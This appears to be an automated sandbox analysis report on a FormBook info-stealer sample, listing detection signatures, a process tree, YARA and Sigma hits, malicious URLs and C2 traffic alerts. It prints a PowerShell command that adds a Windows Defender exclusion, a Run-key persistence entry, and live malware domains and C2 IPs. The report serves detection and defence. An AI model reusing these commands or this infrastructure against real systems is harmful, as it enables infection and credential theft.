Windows Analysis Report
Nieuwebestellingen10122024.exe

Overview

General Information

Sample name: Nieuwebestellingen10122024.exe
Analysis ID: 1572930
MD5: 9a344f7aa0c680768aba67a0738dee2a
SHA1: f7d395145a4e8b164e505971dd27c5b201f41a09
SHA256: d8a46beafd4bd9945e59fbca9ad1801400b77173aa987651b8f434148bfd4d94
Tags: exe, Formbook, user-lowmal3
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Disables UAC (registry)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file does not import any functions
Potential browser exploit detected (process start blacklist hit)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Nieuwebestellingen10122024.exe (PID: 6096 cmdline: "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" MD5: 9A344F7AA0C680768ABA67A0738DEE2A)
    • conhost.exe (PID: 744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1644 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • iexplore.exe (PID: 6752 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
      • tCyxXhRNgdPI.exe (PID: 6076 cmdline: "C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wscript.exe (PID: 6224 cmdline: "C:\Windows\SysWOW64\wscript.exe" MD5: FF00E0480075B095948000BDC66E81F0)
          • tCyxXhRNgdPI.exe (PID: 4352 cmdline: "C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7848 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • iexplore.exe (PID: 616 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
    • WerFault.exe (PID: 428 cmdline: C:\Windows\system32\WerFault.exe -u -p 6096 -s 1612 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • iexplore.exe (PID: 3752 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
    • iexplore.exe (PID: 5032 cmdline: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" MD5: CFE2E6942AC1B72981B3105E22D3224E)
      • iexplore.exe (PID: 3788 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17410 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
        • ie_to_edge_stub.exe (PID: 6108 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c MD5: 89CF8972D683795DAB6901BC9456675D)
          • msedge.exe (PID: 2180 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 3648 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 7912 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5972 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 7220 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=1272 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • ssvagent.exe (PID: 1400 cmdline: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new MD5: F9A898A606E7F5A1CD7CFFA8079253A0)
      • iexplore.exe (PID: 3424 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17416 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
  • svchost.exe (PID: 3148 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • iexplore.exe (PID: 8152 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
    • iexplore.exe (PID: 8188 cmdline: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" MD5: CFE2E6942AC1B72981B3105E22D3224E)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000C.00000002.4498799209.00000000007D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000005.00000002.2332811973.00000000031F0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.4499774124.0000000000A20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.4502014395.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
5.2.iexplore.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.iexplore.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe", ParentImage: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe, ParentProcessId: 6096, ParentProcessName: Nieuwebestellingen10122024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, ProcessId: 2676, ProcessName: powershell.exe
                Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Program Files (x86)\Internet Explorer\iexplore.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 6224, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LDSP2VC8
                Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine|base64offset|contains: w, Image: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, NewProcessName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, OriginalFileName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, ParentCommandLine: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17410 /prefetch:2, ParentImage: C:\Program Files (x86)\Internet Explorer\iexplore.exe, ParentProcessId: 3788, ParentProcessName: iexplore.exe, ProcessCommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, ProcessId: 1400, ProcessName: ssvagent.exe
                Source: Registry Key set | Author: frack113 | Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Program Files\Internet Explorer\iexplore.exe, ProcessId: 5032, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SecuritySafe
                Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe", ParentImage: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe, ParentProcessId: 6096, ParentProcessName: Nieuwebestellingen10122024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force, ProcessId: 2676, ProcessName: powershell.exe
                Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3148, ProcessName: svchost.exe


                AV Detection

                Source: http://www.restobarbebek.xyz/jm9b/ | Avira URL Cloud: Label: malware
                Source: https://deals.getxtra-pc.io/2QSW9DWJ/S2PR7B/?uid=146&sub1=enus5-1211 | Avira URL Cloud: Label: malware
                Source: https://www.whskysr.com/27MTDK4Q/GG1SRSH/?uid=43019&sub1=enus3-1211 | Avira URL Cloud: Label: malware
                Source: Nieuwebestellingen10122024.exe | ReversingLabs: Detection: 36%
                Source: Nieuwebestellingen10122024.exe | Virustotal: Detection: 30%
                Source: Yara match | File source: 5.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000C.00000002.4498799209.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2332811973.00000000031F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.4499774124.0000000000A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.4502014395.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2334142398.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.4500032925.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                Source: Nieuwebestellingen10122024.exe | Joe Sandbox ML: detected

                Exploits

                Source: Yara match | File source: 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Nieuwebestellingen10122024.exe PID: 6096, type: MEMORYSTR
                Source: unknown | HTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.5:49832 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.5:49831 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 18.165.220.110:443 -> 192.168.2.5:49826 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 18.165.220.110:443 -> 192.168.2.5:49825 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 18.165.220.110:443 -> 192.168.2.5:49849 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 18.165.220.110:443 -> 192.168.2.5:49848 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 151.101.1.108:443 -> 192.168.2.5:49879 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 151.101.1.108:443 -> 192.168.2.5:49878 version: TLS 1.2
                Source: Nieuwebestellingen10122024.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: iexplore.pdbUGP source: wscript.exe, 0000000C.00000002.4501045338.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 0000000C.00000002.4499908466.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000000.2400868410.000000000277C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2664175943.000000003870C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: System.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: Microsoft.CSharp.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: wntdll.pdbUGP source: iexplore.exe, 00000005.00000002.2333103481.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2231798388.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2234062433.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2327905828.0000000004560000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2334874427.0000000004711000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: wntdll.pdb source: iexplore.exe, iexplore.exe, 00000005.00000002.2333103481.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2231798388.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2234062433.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, wscript.exe, 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2327905828.0000000004560000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2334874427.0000000004711000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wscript.pdb source: iexplore.exe, 00000005.00000003.2328045546.0000000000C95000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499330641.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: wscript.pdbGCTL source: iexplore.exe, 00000005.00000003.2328045546.0000000000C95000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499330641.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.pdbP/ source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tCyxXhRNgdPI.exe, 0000000B.00000000.2249922753.0000000000CDE000.00000002.00000001.01000000.00000007.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4499475516.0000000000CDE000.00000002.00000001.01000000.00000007.sdmp
                Source: Binary string: System.Dynamic.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Management.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: mscorlib.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Management.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Core.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: iexplore.pdb source: wscript.exe, 0000000C.00000002.4501045338.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 0000000C.00000002.4499908466.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000000.2400868410.000000000277C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2664175943.000000003870C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Windows\SysWOW64\wscript.exe | Code function: 12_2_0036C7A0 FindFirstFileW,FindNextFileW,FindClose, | 12_2_0036C7A0
                Source: C:\Windows\SysWOW64\wscript.exe | Code function: 4x nop then xor eax, eax | 12_2_00359F20
                Source: C:\Windows\SysWOW64\wscript.exe | Code function: 4x nop then mov ebx, 00000004h | 12_2_047104CE
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe | Code function: 4x nop then xor eax, eax | 13_2_04BDB791
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                Networking

                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49769 -> 185.106.176.204:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49953 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49934 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:49934 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49927 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49944 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 5.39.10.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 5.39.10.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 5.39.10.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50007 -> 5.39.10.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50029 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50035 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50041 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50047 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50069 -> 209.74.64.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50075 -> 209.74.64.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50081 -> 209.74.64.187:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50087 -> 209.74.64.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50105 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50107 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50111 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50109 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50117 -> 47.238.157.253:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50118 -> 47.238.157.253:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50110 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50106 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50108 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50119 -> 67.223.117.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50115 -> 47.238.157.253:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50120 -> 67.223.117.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50103 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50104 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50112 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50122 -> 67.223.117.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50113 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50114 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50125 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50126 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50123 -> 67.223.117.169:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50127 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50124 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50116 -> 47.238.157.253:80
                Source: DNS query: www.swenansiansie.xyz
                Source: DNS query: www.mp3cevir.xyz
                Source: DNS query: www.restobarbebek.xyz
